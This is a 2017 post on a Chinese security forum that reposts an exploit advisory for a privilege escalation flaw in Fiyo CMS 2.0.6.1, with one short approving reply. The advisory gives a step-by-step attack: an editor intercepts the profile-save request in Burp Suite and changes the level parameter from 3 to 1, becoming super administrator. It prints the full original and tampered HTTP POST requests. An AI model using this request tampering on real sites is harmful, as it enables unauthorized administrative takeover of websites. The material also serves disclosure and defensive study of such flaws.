查看: 10726|回复: 1

Fiyo CMS 2.0.6.1 权限提升漏洞

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2017-3-13 20:27:00 | 显示全部楼层 |阅读模式
    [PHP] 纯文本查看 复制代码
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
    # Google Dork: no
    # Date: 11-03-2017
    # Exploit Author: @rungga_reksya, @dvnrcy
    # Vendor Homepage: [url]http://www.fiyo.org[/url]
    # Software Link: [url]https://sourceforge.net/projects/fiyo-cms[/url]
    # Version: 2.0.6.1
    # Tested on: Windows Server 2012 Datacenter Evaluation
    # CVE : no
      
    I. Background (Bahasa/Indonesian Language):
    Fiyo CMS dikembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.
      
    II. Description:
    Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
      
    III. Exploit:
    Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).
      
    If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
    super administrator = 1
    administrator = 2
    editor = 3
    publisher = 4
    member = 5
      
    Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).A  The first you access on menu aEdit Profilea and click aSimpan (Save)a, and then change like this on your burpsuite intercept menu:
      
    Original:
      
    POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
    Host: 192.168.1.2
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: [url]http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3[/url]
    Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 134
      
    edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=
      
      
    Manipulation (Change Level=3 to be Level=1):
      
    POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
    Host: 192.168.1.2
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: [url]http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3[/url]
    Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 134
      
    edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=
      
    Yeaaah, now editor become super administrator privilege and The level of administrator can be super administrator too ^_^
      
      
    IV. Thanks to:
    - Alloh SWT
    - MyBoboboy
    - MII CAS
    - Komunitas IT Auditor & IT Security Kaskus
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2018-8-26 13:46
  • 签到天数: 426 天

    [LV.9]以坛为家II

    发表于 2017-3-15 20:53:36 | 显示全部楼层
    不错 支持下
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 03:50 , Processed in 0.018824 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部